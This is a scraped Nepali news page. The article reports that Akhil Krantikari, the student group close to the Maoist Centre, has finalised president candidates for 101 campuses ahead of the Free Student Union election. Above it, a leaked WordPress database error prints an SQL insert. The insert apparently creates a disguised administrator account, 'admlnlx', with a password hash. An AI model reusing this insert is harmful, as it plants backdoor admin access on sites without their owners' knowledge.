WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLESEk00hcGi38COeiNa81jtzvdCUa1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 00:34:37', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ३ –
आगामी १४ गते हुने स्वतन्त्र विद्यार्थी युनियनको चुनावको लागि नेकपा माओवादी केन्द्र निकट अखिल क्रान्तिकारीले १ सय १ वटा क्याम्पसको लागि सभापतिका उम्मेद्वारको टुंगो लगाएको छ ।
देशभरका विभिन्न १ सय १ क्याम्पसमा सभापतिका उम्मेद्वारको नाम सहमतिमै टुंगो लगाएको अखिल क्रान्तिकारीका प्रवक्ता सुरेन्द्र बस्नेतले जानकारी दिनुभयो । विभिन्न विद्यार्थी संगठनको आन्तरिक विवादका कारण क्याम्पसहरुमा तालाबन्दी गरेका बेला जसरी पनि चुनाव हुनुपर्ने भन्दै अखिल क्रान्तिकारीले भने सभापतिका उम्मेद्वारको नाम प्रकाशन गरेको हो ।